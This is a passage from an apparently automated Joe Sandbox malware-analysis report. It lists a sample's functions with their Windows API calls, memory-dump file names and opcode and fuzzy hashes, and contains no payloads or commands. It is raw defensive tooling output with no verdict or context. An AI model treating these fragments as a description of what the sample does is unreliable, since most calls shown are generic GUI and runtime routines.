                                                                                                            • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EA7E51,?,?,00000000), ref: 00E54041
                                                                                                            • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EA7E51,?,?,00000000,?,?), ref: 00E54065
                                                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00EB6A84
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6A8F
                                                                                                          • _memmove.LIBCMT ref: 00EB6ABC
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 00EB6AC7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 1504782959-0
                                                                                                          • Opcode ID: c1972cd05e0c7e2055aa93f2e69c0ee17c909f64b58b602e06afabb03147b6bf
                                                                                                          • Instruction ID: 42f278d381ff569fec65373249c4a7240b41f9ab300de45d3a580b2df34bdd09
                                                                                                          • Opcode Fuzzy Hash: c1972cd05e0c7e2055aa93f2e69c0ee17c909f64b58b602e06afabb03147b6bf
                                                                                                          • Instruction Fuzzy Hash: 37114F76600108AFCB04EBA4D946EEEB7F8EF04311B145065F902B72A1DF319E18DB91
                                                                                                          Function 00E996F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E99719
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E9972B
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E99741
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E9975C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: c0ca1ff80bb4427e8d33f9c890beefe7e8ef55767fcf2ba1fc651530d4a9efd7
                                                                                                          • Instruction ID: be01a7db54a5c7a7e35ff9a803f1071e9402b26cc6239a8b5b6c5e18bb75fafa
                                                                                                          • Opcode Fuzzy Hash: c0ca1ff80bb4427e8d33f9c890beefe7e8ef55767fcf2ba1fc651530d4a9efd7
                                                                                                          • Instruction Fuzzy Hash: 96114839901218FFEF10DF99C984E9DBBB8FB48710F204096E900B7290DA71AE10DB90
                                                                                                          Function 00E4166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00E416B4
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E7B93C
                                                                                                          • GetCursorPos.USER32(?), ref: 00E7B946
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E7B951
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4127811313-0
                                                                                                          • Opcode ID: 3da15881f6a7de7fd1bb9e6ce088ed1d4d9cbb0a010e1d94335dbfaa504a2c5d
                                                                                                          • Instruction ID: 24fffe5f553d5a3fb4657c85192b68ff5d2a6b34744ff906165c0c68ff250753
                                                                                                          • Opcode Fuzzy Hash: 3da15881f6a7de7fd1bb9e6ce088ed1d4d9cbb0a010e1d94335dbfaa504a2c5d
                                                                                                          • Instruction Fuzzy Hash: 85113275A01119AFCF10EF98E885ABE77B8EB44300F180496E911E7140C730FA91CBA2
                                                                                                          Function 00E42111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00E42163
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3970641297-0
                                                                                                          • Opcode ID: cd38d363316a70b2f66e87606be69cfb587392e7c2b85a558b065a808aa95eb7
                                                                                                          • Instruction ID: b61fcc37217ea3b0cbfc05f67a6e66137ca672fb1ddc2d3f088ccfbdfc41610e
                                                                                                          • Opcode Fuzzy Hash: cd38d363316a70b2f66e87606be69cfb587392e7c2b85a558b065a808aa95eb7
                                                                                                          • Instruction Fuzzy Hash: 13118B72502249BFDF029FA0AC44EEABBA9EF58394F44111AFB0466250C771DC60ABA0
                                                                                                          Function 00EA1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA195E
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA1983
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA198D
                                                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA19C0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 2875609808-0
                                                                                                          • Opcode ID: 32959910b0255d9165c3ec5a5ad153541f0b939af352d20bd6838e93f1650a26
                                                                                                          • Instruction ID: e5505ff090ac064b1a80f8a4378e576c855e33170b31ef79233911c8d10efc8c
                                                                                                          • Opcode Fuzzy Hash: 32959910b0255d9165c3ec5a5ad153541f0b939af352d20bd6838e93f1650a26
                                                                                                          • Instruction Fuzzy Hash: B1114C31C0552CDBCF009FA5E9587EEBB78FF8A751F044086D980BA240CB30A554CB91
                                                                                                          Function 00ECE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00ECE1EA
                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00ECE201
                                                                                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00ECE216
                                                                                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00ECE234
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352324309-0
                                                                                                          • Opcode ID: 9c8ca7ee5f20bf8116af3edaf0e8d0b754b7206c2aa14b8b6cd4b33b215fd5bf
                                                                                                          • Instruction ID: cd1079db313ae7a43bb8d234c05b90ae181d3b56ff27ebf8e3efd679e6ecba5c
                                                                                                          • Opcode Fuzzy Hash: 9c8ca7ee5f20bf8116af3edaf0e8d0b754b7206c2aa14b8b6cd4b33b215fd5bf
                                                                                                          • Instruction Fuzzy Hash: B21165B5206304DFE3348F51EE0CF97BBBCEB00B04F10955EA666E6160D7B1E5099B91
                                                                                                          Function 00E771E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                          • Instruction ID: 3653dd44dca36f6b3de161d1954de5d4360978fd6c3f320cad857847e9e5a2c6
                                                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                          • Instruction Fuzzy Hash: 8C0180B204818EBBCF125E84CC018ED3F62BB19344B089515FEACA8532D736C9B1AB81
                                                                                                          Function 00ECB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00ECB956
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00ECB96E
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00ECB992
                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECB9AD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: bb46dfd935b0713a6faa5cb363b3789fdb6dc2af0445ca29cfeb593c8ce030fa
                                                                                                          • Instruction ID: 069a27fd507e8b0337eff304e16a2b1b1dfc1208cdbdd7a1cdeb2b6e43189085
                                                                                                          • Opcode Fuzzy Hash: bb46dfd935b0713a6faa5cb363b3789fdb6dc2af0445ca29cfeb593c8ce030fa
                                                                                                          • Instruction Fuzzy Hash: 151174B9D00209EFDB41CF99D984AEEBBF9FF48310F104156E925E3610D731AA658F50
                                                                                                          Function 00ECBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00ECBCB6
                                                                                                          • _memset.LIBCMT ref: 00ECBCC5
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F08F20,00F08F64), ref: 00ECBCF4
                                                                                                          • CloseHandle.KERNEL32 ref: 00ECBD06
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3277943733-0
                                                                                                          • Opcode ID: b2bb2f708e4505cf9864418f270617af0311c5c9beed0f8ac2681ec6a66c9f02
                                                                                                          • Instruction ID: 67c0dccaec34a275f87c1ac6574b18483d1cbf34d9f184d74d5656ecc0269fbf
                                                                                                          • Opcode Fuzzy Hash: b2bb2f708e4505cf9864418f270617af0311c5c9beed0f8ac2681ec6a66c9f02
                                                                                                          • Instruction Fuzzy Hash: 44F089B15403057FE35027717C09FB73B5DEB08796F041421BA48E5192DF714C11A7A8
                                                                                                          Function 00EA7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00EA71A1
                                                                                                            • Part of subcall function 00EA7C7F: _memset.LIBCMT ref: 00EA7CB4
                                                                                                          • _memmove.LIBCMT ref: 00EA71C4
                                                                                                          • _memset.LIBCMT ref: 00EA71D1
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00EA71E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 48991266-0
                                                                                                          • Opcode ID: 0484744126d09977a8e2318bb8d761b8b25693294b7b5ba3ef93ef4dd0d27ebf
                                                                                                          • Instruction ID: 91640a99a14fede6f43275047a1cd29d3f2192f661412af74ae32889034b7afb
                                                                                                          • Opcode Fuzzy Hash: 0484744126d09977a8e2318bb8d761b8b25693294b7b5ba3ef93ef4dd0d27ebf
                                                                                                          • Instruction Fuzzy Hash: F7F05436101100AFCF416F55EC89B4AFB69EF49360F08C051FE086E22BC731A915DBB4
                                                                                                          Function 00ECC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E416CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E41729
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41738
                                                                                                            • Part of subcall function 00E416CF: BeginPath.GDI32(?), ref: 00E4174F
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41778
                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00ECC3E8
                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 00ECC3F5
                                                                                                          • EndPath.GDI32(00000000), ref: 00ECC405
                                                                                                          • StrokePath.GDI32(00000000), ref: 00ECC413
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 1539411459-0
                                                                                                          • Opcode ID: f839602c386701ec23f7d769bfa2f5023740d16f57fd883b534021fe2ebde18b
                                                                                                          • Instruction ID: e57d1430cd50c7c5c029057ebf95b001474414c6f31b98b47d62a37429f4cf0e
                                                                                                          • Opcode Fuzzy Hash: f839602c386701ec23f7d769bfa2f5023740d16f57fd883b534021fe2ebde18b
                                                                                                          • Instruction Fuzzy Hash: B4F0BE32006219BADB122F51AC0DFCE3F99FF05310F188045FA55310E183756555DBA9
                                                                                                          Function 00E9AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E9AA6F
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9AA82
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00E9AA89
                                                                                                          • AttachThreadInput.USER32(00000000), ref: 00E9AA90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2710830443-0
                                                                                                          • Opcode ID: f31934eeef00399633ea9151c3ec4853dc4b4a27784327b1dbff98b0e771bcdf
                                                                                                          • Instruction ID: c12959e9933dfe74c3fa888794db6e495516d53bbc1db62dd0c13596d740ecb1
                                                                                                          • Opcode Fuzzy Hash: f31934eeef00399633ea9151c3ec4853dc4b4a27784327b1dbff98b0e771bcdf
                                                                                                          • Instruction Fuzzy Hash: 7CE03971542228BBDB215FA2AD0CFEB3F1CEF527A1F488022F519A4450C6B1C554CBE0
                                                                                                          Function 00E425F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000008), ref: 00E4260D
                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00E42617
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00E4262C
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00E42634
                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 00E7C1C4
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E7C1D1
                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00E7C1EA
                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00E7C203
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00E7C223
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E7C22E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1946975507-0
                                                                                                          • Opcode ID: 38a48220410433067f4b297c580ac9658ef088edbe3159d9b995bd17774c1cdd
                                                                                                          • Instruction ID: 47c8bd5c8157bc5544634dcecf8561d551270a910519f77399abef5841da7869
                                                                                                          • Opcode Fuzzy Hash: 38a48220410433067f4b297c580ac9658ef088edbe3159d9b995bd17774c1cdd
                                                                                                          • Instruction Fuzzy Hash: 91E06531506244BFDB215FB5BC097D83B15EB05335F1883ABFA69680E187714984DB11
                                                                                                          Function 00E99330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 00E99339
                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E98F04), ref: 00E99340
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E98F04), ref: 00E9934D
                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E98F04), ref: 00E99354
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3974789173-0
                                                                                                          • Opcode ID: a6fb6d5398e91b6281523021bd6a5685be746c10f4215e920748224aa22f8989
                                                                                                          • Instruction ID: 8e5bb56edb775843ac81ac474f5802c9050fb3533b772f0110180bc772b95e8c
                                                                                                          • Opcode Fuzzy Hash: a6fb6d5398e91b6281523021bd6a5685be746c10f4215e920748224aa22f8989
                                                                                                          • Instruction Fuzzy Hash: 29E08632603211BFDB205FF67D0EB563B6CEF50795F184C19B245E9091E6349448C750
                                                                                                          Function 00E80679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00E80679
                                                                                                          • GetDC.USER32(00000000), ref: 00E80683
